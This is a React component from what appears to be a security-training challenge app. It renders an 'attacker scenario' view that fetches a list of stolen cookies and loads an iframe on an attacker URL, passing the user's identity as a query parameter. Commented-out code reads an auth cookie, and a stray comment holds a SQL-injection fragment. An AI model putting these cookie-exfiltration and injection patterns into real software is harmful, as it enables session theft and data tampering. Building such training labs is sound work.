// src/App.js
import React, { useContext, useEffect, useState } from 'react';
import { Container, CssBaseline } from '@mui/material';
import { Grid, Paper, Typography } from '@material-ui/core';

import { useTheme } from "styled-components";
import useStyles from "./styles.js";
import { ChallengeDataContext } from 'contexts/ChallengeData.js';
import { fetchStolenCookies } from 'actions/attackerScenario.js';
import { useDispatch } from 'react-redux';
;

const AttackerScenario = () => {

    // const {activeTab, session} = useContext(ChallengeDataContext);
    const theme = useTheme();
    const classes = useStyles(theme);
    const [error, setError] = useState(null);
    const [stolenCookies, setStolenCookies] = useState([]);
    const [iframeSrc, setIframeSrc] = useState(null);

    const dispatch = useDispatch();

    useEffect(() => {
        dispatch(fetchStolenCookies()).then((data) => {
            if(data)
            {
                if(data.message){
                    setError(data.message)
                }
                else{
                    setStolenCookies(data.data);
                }
            }
            else{
                setError("Error fetching stolen cookies");
            }
        });

        // const match = /auth=([^;]+)/.exec(document.cookie);
        // const authValue = match ? match[1] : null;
        // get the username from the local storage
        const profile = localStorage.getItem('profile');
        const authValue = JSON.parse(profile).result.username;
        setIframeSrc(`${process.env.REACT_APP_ATTACKER_URL}?auth=${encodeURIComponent(authValue)}`)
    },[]);

    //' OR balance > 1000000

    return (
        <Container component="main" maxWidth="md">
            <CssBaseline />
            <Paper className={classes.paper}>
                {/* <h2>All Cookies</h2>
                <Typography>Cookies I stole so far...</Typography>
                <Grid container spacing={2}>
                    <Grid item xs={6}>
                        <Typography variant="h6">Origin</Typography>
                        {stolenCookies.map((cookie, index) => (
                            <Typography key={index}>{cookie.origin}</Typography>
                        ))}
                    </Grid>
                    <Grid item xs={6}>
                        <Typography variant="h6">Cookie</Typography>
                        {stolenCookies.map((cookie, index) => (
                            <Typography key={index}>{cookie.cookie}</Typography>
                        ))}
                    </Grid>
                </Grid>
                {error && <Typography>{error}</Typography>} */}
                {iframeSrc && 
                (<iframe
                    title="Attacker Scenario"
                    src={iframeSrc}
                    style={{ width: '100%', height: '500px', border: 'none' }}
                />)}
            </Paper>
            {/* <OpenModal modal={"finish"} title="Finish"></OpenModal> */}
        </Container>
    );
};

export default AttackerScenario;